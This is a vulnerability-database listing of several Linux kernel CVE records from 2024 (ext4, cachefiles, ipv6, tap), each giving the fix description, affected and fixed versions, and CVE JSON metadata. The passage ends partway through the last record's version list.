In the Linux kernel, the following vulnerability has been resolved: ext4: fix infinite loop when replaying fast_commit When doing fast_commit replay an infinite loop may occur due to an uninitialized extent_status struct. ext4_ext_determine_insert_hole() does not detect the replay and calls ext4_es_find_extent_range(), which will return immediately without initializing the 'es' variable. Because 'es' contains garbage, an integer overflow may happen causing an infinite loop in this function, easily reproducible using fstest generic/039. This commit fixes this issue by unconditionally initializing the structure in function ext4_es_find_extent_range(). Thanks to Zhang Yi, for figuring out the real problem!

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/5ed0496e383cb6de1…
	https://git.kernel.org/stable/c/0619f7750f2b178a1…
	https://git.kernel.org/stable/c/181e63cd595c68819…
	https://git.kernel.org/stable/c/c6e67df64783e99a6…
	https://git.kernel.org/stable/c/81f819c537d29932e…
	https://git.kernel.org/stable/c/907c3fe532253a6ef…

Impacted products

Vendor

Product

Version

Linux

Affected: 8016e29f4362e285f0f7e38fadc61a5b7bdfdfa2 , < 5ed0496e383cb6de120e56991385dce70bbb87c1 (git)
Affected: 8016e29f4362e285f0f7e38fadc61a5b7bdfdfa2 , < 0619f7750f2b178a1309808832ab20d85e0ad121 (git)
Affected: 8016e29f4362e285f0f7e38fadc61a5b7bdfdfa2 , < 181e63cd595c688194e07332f9944b3a63193de2 (git)
Affected: 8016e29f4362e285f0f7e38fadc61a5b7bdfdfa2 , < c6e67df64783e99a657ef2b8c834ba2bf54c539c (git)
Affected: 8016e29f4362e285f0f7e38fadc61a5b7bdfdfa2 , < 81f819c537d29932e4b9267f02411cbc8b355178 (git)
Affected: 8016e29f4362e285f0f7e38fadc61a5b7bdfdfa2 , < 907c3fe532253a6ef4eb9c4d67efb71fab58c706 (git)

Linux

Affected: 5.10
Unaffected: 0 , < 5.10 (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.103 , ≤ 6.1.* (semver)
Unaffected: 6.6.44 , ≤ 6.6.* (semver)
Unaffected: 6.10.3 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-43828",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:08:37.888244Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:24.045Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:05:09.355Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/ext4/extents_status.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5ed0496e383cb6de120e56991385dce70bbb87c1",
              "status": "affected",
              "version": "8016e29f4362e285f0f7e38fadc61a5b7bdfdfa2",
              "versionType": "git"
            },
            {
              "lessThan": "0619f7750f2b178a1309808832ab20d85e0ad121",
              "status": "affected",
              "version": "8016e29f4362e285f0f7e38fadc61a5b7bdfdfa2",
              "versionType": "git"
            },
            {
              "lessThan": "181e63cd595c688194e07332f9944b3a63193de2",
              "status": "affected",
              "version": "8016e29f4362e285f0f7e38fadc61a5b7bdfdfa2",
              "versionType": "git"
            },
            {
              "lessThan": "c6e67df64783e99a657ef2b8c834ba2bf54c539c",
              "status": "affected",
              "version": "8016e29f4362e285f0f7e38fadc61a5b7bdfdfa2",
              "versionType": "git"
            },
            {
              "lessThan": "81f819c537d29932e4b9267f02411cbc8b355178",
              "status": "affected",
              "version": "8016e29f4362e285f0f7e38fadc61a5b7bdfdfa2",
              "versionType": "git"
            },
            {
              "lessThan": "907c3fe532253a6ef4eb9c4d67efb71fab58c706",
              "status": "affected",
              "version": "8016e29f4362e285f0f7e38fadc61a5b7bdfdfa2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/ext4/extents_status.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.10"
            },
            {
              "lessThan": "5.10",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.103",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.44",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.103",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.44",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.3",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix infinite loop when replaying fast_commit\n\nWhen doing fast_commit replay an infinite loop may occur due to an\nuninitialized extent_status struct.  ext4_ext_determine_insert_hole() does\nnot detect the replay and calls ext4_es_find_extent_range(), which will\nreturn immediately without initializing the \u0027es\u0027 variable.\n\nBecause \u0027es\u0027 contains garbage, an integer overflow may happen causing an\ninfinite loop in this function, easily reproducible using fstest generic/039.\n\nThis commit fixes this issue by unconditionally initializing the structure\nin function ext4_es_find_extent_range().\n\nThanks to Zhang Yi, for figuring out the real problem!"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:27:10.038Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/5ed0496e383cb6de120e56991385dce70bbb87c1"
        },
        {
          "url": "https://git.kernel.org/stable/c/0619f7750f2b178a1309808832ab20d85e0ad121"
        },
        {
          "url": "https://git.kernel.org/stable/c/181e63cd595c688194e07332f9944b3a63193de2"
        },
        {
          "url": "https://git.kernel.org/stable/c/c6e67df64783e99a657ef2b8c834ba2bf54c539c"
        },
        {
          "url": "https://git.kernel.org/stable/c/81f819c537d29932e4b9267f02411cbc8b355178"
        },
        {
          "url": "https://git.kernel.org/stable/c/907c3fe532253a6ef4eb9c4d67efb71fab58c706"
        }
      ],
      "title": "ext4: fix infinite loop when replaying fast_commit",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-43828",
    "datePublished": "2024-08-17T09:21:47.429Z",
    "dateReserved": "2024-08-17T09:11:59.273Z",
    "dateUpdated": "2025-11-03T22:05:09.355Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41051 (GCVE-0-2024-41051)

Vulnerability from cvelistv5 – Published: 2024-07-29 14:32 – Updated: 2025-11-03 21:59

Title

cachefiles: wait for ondemand_object_worker to finish when dropping object

Summary

In the Linux kernel, the following vulnerability has been resolved: cachefiles: wait for ondemand_object_worker to finish when dropping object When queuing ondemand_object_worker() to re-open the object, cachefiles_object is not pinned. The cachefiles_object may be freed when the pending read request is completed intentionally and the related erofs is umounted. If ondemand_object_worker() runs after the object is freed, it will incur use-after-free problem as shown below. process A processs B process C process D cachefiles_ondemand_send_req() // send a read req X // wait for its completion // close ondemand fd cachefiles_ondemand_fd_release() // set object as CLOSE cachefiles_ondemand_daemon_read() // set object as REOPENING queue_work(fscache_wq, &info->ondemand_work) // close /dev/cachefiles cachefiles_daemon_release cachefiles_flush_reqs complete(&req->done) // read req X is completed // umount the erofs fs cachefiles_put_object() // object will be freed cachefiles_ondemand_deinit_obj_info() kmem_cache_free(object) // both info and object are freed ondemand_object_worker() When dropping an object, it is no longer necessary to reopen the object, so use cancel_work_sync() to cancel or wait for ondemand_object_worker() to finish.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/ec9289369259d982e…
	https://git.kernel.org/stable/c/d3179bae72b1b5e55…
	https://git.kernel.org/stable/c/b26525b2183632f16…
	https://git.kernel.org/stable/c/12e009d60852f7bce…

Impacted products

Vendor

Product

Version

Linux

Affected: f17443d52d805c9a7fab5e67a4e8b973626fe1cd , < ec9289369259d982e735a71437e32e6b4035290c (git)
Affected: f740fd943bb1fbf79b7eaba3c71eb7536f437f51 , < d3179bae72b1b5e555ba839d6d9f40a350a4d78a (git)
Affected: 0a7e54c1959c0feb2de23397ec09c7692364313e , < b26525b2183632f16a3a4108fe6a4bfa8afac6ed (git)
Affected: 0a7e54c1959c0feb2de23397ec09c7692364313e , < 12e009d60852f7bce0afc373ca0b320f14150418 (git)

Linux

Affected: 6.8
Unaffected: 0 , < 6.8 (semver)
Unaffected: 6.1.100 , ≤ 6.1.* (semver)
Unaffected: 6.6.41 , ≤ 6.6.* (semver)
Unaffected: 6.9.10 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:59:52.818Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ec9289369259d982e735a71437e32e6b4035290c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d3179bae72b1b5e555ba839d6d9f40a350a4d78a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b26525b2183632f16a3a4108fe6a4bfa8afac6ed"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/12e009d60852f7bce0afc373ca0b320f14150418"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41051",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:22:41.369243Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:01.915Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/cachefiles/ondemand.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "ec9289369259d982e735a71437e32e6b4035290c",
              "status": "affected",
              "version": "f17443d52d805c9a7fab5e67a4e8b973626fe1cd",
              "versionType": "git"
            },
            {
              "lessThan": "d3179bae72b1b5e555ba839d6d9f40a350a4d78a",
              "status": "affected",
              "version": "f740fd943bb1fbf79b7eaba3c71eb7536f437f51",
              "versionType": "git"
            },
            {
              "lessThan": "b26525b2183632f16a3a4108fe6a4bfa8afac6ed",
              "status": "affected",
              "version": "0a7e54c1959c0feb2de23397ec09c7692364313e",
              "versionType": "git"
            },
            {
              "lessThan": "12e009d60852f7bce0afc373ca0b320f14150418",
              "status": "affected",
              "version": "0a7e54c1959c0feb2de23397ec09c7692364313e",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/cachefiles/ondemand.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.8"
            },
            {
              "lessThan": "6.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.100",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.41",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.100",
                  "versionStartIncluding": "6.1.95",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.41",
                  "versionStartIncluding": "6.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.10",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncachefiles: wait for ondemand_object_worker to finish when dropping object\n\nWhen queuing ondemand_object_worker() to re-open the object,\ncachefiles_object is not pinned. The cachefiles_object may be freed when\nthe pending read request is completed intentionally and the related\nerofs is umounted. If ondemand_object_worker() runs after the object is\nfreed, it will incur use-after-free problem as shown below.\n\nprocess A  processs B  process C  process D\n\ncachefiles_ondemand_send_req()\n// send a read req X\n// wait for its completion\n\n           // close ondemand fd\n           cachefiles_ondemand_fd_release()\n           // set object as CLOSE\n\n                       cachefiles_ondemand_daemon_read()\n                       // set object as REOPENING\n                       queue_work(fscache_wq, \u0026info-\u003eondemand_work)\n\n                                // close /dev/cachefiles\n                                cachefiles_daemon_release\n                                cachefiles_flush_reqs\n                                complete(\u0026req-\u003edone)\n\n// read req X is completed\n// umount the erofs fs\ncachefiles_put_object()\n// object will be freed\ncachefiles_ondemand_deinit_obj_info()\nkmem_cache_free(object)\n                       // both info and object are freed\n                       ondemand_object_worker()\n\nWhen dropping an object, it is no longer necessary to reopen the object,\nso use cancel_work_sync() to cancel or wait for ondemand_object_worker()\nto finish."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:20:58.752Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/ec9289369259d982e735a71437e32e6b4035290c"
        },
        {
          "url": "https://git.kernel.org/stable/c/d3179bae72b1b5e555ba839d6d9f40a350a4d78a"
        },
        {
          "url": "https://git.kernel.org/stable/c/b26525b2183632f16a3a4108fe6a4bfa8afac6ed"
        },
        {
          "url": "https://git.kernel.org/stable/c/12e009d60852f7bce0afc373ca0b320f14150418"
        }
      ],
      "title": "cachefiles: wait for ondemand_object_worker to finish when dropping object",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41051",
    "datePublished": "2024-07-29T14:32:07.577Z",
    "dateReserved": "2024-07-12T12:17:45.626Z",
    "dateUpdated": "2025-11-03T21:59:52.818Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-44986 (GCVE-0-2024-44986)

Vulnerability from cvelistv5 – Published: 2024-09-04 19:54 – Updated: 2025-11-03 22:14

Title

ipv6: fix possible UAF in ip6_finish_output2()

Summary

In the Linux kernel, the following vulnerability has been resolved: ipv6: fix possible UAF in ip6_finish_output2() If skb_expand_head() returns NULL, skb has been freed and associated dst/idev could also have been freed. We need to hold rcu_read_lock() to make sure the dst and associated idev are alive.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e891b36de161fcd96…
	https://git.kernel.org/stable/c/3574d28caf9a09756…
	https://git.kernel.org/stable/c/6ab6bf731354a6fdb…
	https://git.kernel.org/stable/c/56efc253196751ece…
	https://git.kernel.org/stable/c/da273b377ae0d9bd2…

Impacted products

Vendor

Product

Version

Linux

Affected: 5796015fa968a3349027a27dcd04c71d95c53ba5 , < e891b36de161fcd96f12ff83667473e5067b9037 (git)
Affected: 5796015fa968a3349027a27dcd04c71d95c53ba5 , < 3574d28caf9a09756ae87ad1ea096c6f47b6101e (git)
Affected: 5796015fa968a3349027a27dcd04c71d95c53ba5 , < 6ab6bf731354a6fdbaa617d1ec194960db61cf3b (git)
Affected: 5796015fa968a3349027a27dcd04c71d95c53ba5 , < 56efc253196751ece1fc535a5b582be127b0578a (git)
Affected: 5796015fa968a3349027a27dcd04c71d95c53ba5 , < da273b377ae0d9bd255281ed3c2adb228321687b (git)
Affected: ded37d03440d0ab346a8287cc2ba88b8dc90ceb0 (git)
Affected: 2323690eb05865a657709f4d28eb9538ea97bfc2 (git)
Affected: b34c668a867ffdcf8bd8db4a36512572e82b4a15 (git)

Linux

Affected: 5.14
Unaffected: 0 , < 5.14 (semver)
Unaffected: 5.15.166 , ≤ 5.15.* (semver)
Unaffected: 6.1.107 , ≤ 6.1.* (semver)
Unaffected: 6.6.48 , ≤ 6.6.* (semver)
Unaffected: 6.10.7 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-44986",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-04T20:20:05.005399Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-04T20:21:13.628Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:14:34.580Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/ip6_output.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e891b36de161fcd96f12ff83667473e5067b9037",
              "status": "affected",
              "version": "5796015fa968a3349027a27dcd04c71d95c53ba5",
              "versionType": "git"
            },
            {
              "lessThan": "3574d28caf9a09756ae87ad1ea096c6f47b6101e",
              "status": "affected",
              "version": "5796015fa968a3349027a27dcd04c71d95c53ba5",
              "versionType": "git"
            },
            {
              "lessThan": "6ab6bf731354a6fdbaa617d1ec194960db61cf3b",
              "status": "affected",
              "version": "5796015fa968a3349027a27dcd04c71d95c53ba5",
              "versionType": "git"
            },
            {
              "lessThan": "56efc253196751ece1fc535a5b582be127b0578a",
              "status": "affected",
              "version": "5796015fa968a3349027a27dcd04c71d95c53ba5",
              "versionType": "git"
            },
            {
              "lessThan": "da273b377ae0d9bd255281ed3c2adb228321687b",
              "status": "affected",
              "version": "5796015fa968a3349027a27dcd04c71d95c53ba5",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "ded37d03440d0ab346a8287cc2ba88b8dc90ceb0",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "2323690eb05865a657709f4d28eb9538ea97bfc2",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "b34c668a867ffdcf8bd8db4a36512572e82b4a15",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/ip6_output.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.14"
            },
            {
              "lessThan": "5.14",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.166",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.107",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.48",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.166",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.107",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.48",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.7",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.4.137",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.10.55",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.13.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fix possible UAF in ip6_finish_output2()\n\nIf skb_expand_head() returns NULL, skb has been freed\nand associated dst/idev could also have been freed.\n\nWe need to hold rcu_read_lock() to make sure the dst and\nassociated idev are alive."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:58:30.916Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e891b36de161fcd96f12ff83667473e5067b9037"
        },
        {
          "url": "https://git.kernel.org/stable/c/3574d28caf9a09756ae87ad1ea096c6f47b6101e"
        },
        {
          "url": "https://git.kernel.org/stable/c/6ab6bf731354a6fdbaa617d1ec194960db61cf3b"
        },
        {
          "url": "https://git.kernel.org/stable/c/56efc253196751ece1fc535a5b582be127b0578a"
        },
        {
          "url": "https://git.kernel.org/stable/c/da273b377ae0d9bd255281ed3c2adb228321687b"
        }
      ],
      "title": "ipv6: fix possible UAF in ip6_finish_output2()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-44986",
    "datePublished": "2024-09-04T19:54:34.852Z",
    "dateReserved": "2024-08-21T05:34:56.671Z",
    "dateUpdated": "2025-11-03T22:14:34.580Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41090 (GCVE-0-2024-41090)

Vulnerability from cvelistv5 – Published: 2024-07-29 06:18 – Updated: 2025-11-03 22:00

Title

tap: add missing verification for short frame

Summary

In the Linux kernel, the following vulnerability has been resolved: tap: add missing verification for short frame The cited commit missed to check against the validity of the frame length in the tap_get_user_xdp() path, which could cause a corrupted skb to be sent downstack. Even before the skb is transmitted, the tap_get_user_xdp()-->skb_set_network_header() may assume the size is more than ETH_HLEN. Once transmitted, this could either cause out-of-bound access beyond the actual length, or confuse the underlayer with incorrect or inconsistent header length in the skb metadata. In the alternative path, tap_get_user() already prohibits short frame which has the length less than Ethernet header size from being transmitted. This is to drop any frame shorter than the Ethernet header size just like how tap_get_user() does. CVE: CVE-2024-41090

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/8be915fc5ff9a5e29…
	https://git.kernel.org/stable/c/7431144b406ae8280…
	https://git.kernel.org/stable/c/e5e5e63c506b93b89…
	https://git.kernel.org/stable/c/ee93e6da30377cf2a…
	https://git.kernel.org/stable/c/aa6a5704cab861c9b…
	https://git.kernel.org/stable/c/73d462a38d5f782b7…
	https://git.kernel.org/stable/c/e1a786b9bbb767fd1…
	https://git.kernel.org/stable/c/ed7f2afdd0e043a39…

Impacted products

Vendor

Product

Version

Linux

Affected: 0efac27791ee068075d80f07c55a229b1335ce12 , < 8be915fc5ff9a5e296f6538be12ea75a1a93bdea (git)
Affected: 0efac27791ee068075d80f07c55a229b1335ce12 , < 7431144b406ae82807eb87d8c98e518475b0450f (git)
Affected: 0efac27791ee068075d80f07c55a229b1335ce12 , < e5e5e63c506b93b89b01f522b6a7343585f784e6 (git)
Affected: 0efac27791ee068075d80f07c55a229b1335ce12 , < ee93e6da30377cf2a75e16cd32bb9fcd86a61c46 (git)
Affected: 0efac27791ee068075d80f07c55a229b1335ce12 , < aa6a5704cab861c9b2ae9f475076e1881e87f5aa (git)
Affected: 0efac27791ee068075d80f07c55a229b1335ce12 , < 73d462a38d5f782b7c872fe9ae8393d9ef5483da (git)
Affected: 0efac27791ee068075d80f07c55a229b1335ce12 , < e1a786b9bbb767fd1c922d424aaa8078cc542309 (git)
Affected: 0efac27791ee068075d80f07c55a229b1335ce12 , < ed7f2afdd0e043a397677e597ced0830b83ba0b3 (git)

Linux

Affected: 4.20
Unaffected: 0 , < 4.20 (semver)
Unaffected: 5.4.281 , ≤ 5.4.* (semver)
Unaffected: 5.10.223 , ≤ 5.10.* (semver)
Unaffected: 5.15.164 , ≤ 5.15.* (semver)
Unaffected: 6.1.102 , ≤ 6.1.* (semver)
Unaffected: 6.6.43 , ≤ 6.6.* (semver)
Unaffected: 6.9.12 , ≤ 6.9.* (semver)
Unaffected: 6.10.2 , ≤ 6.10.* (semver)
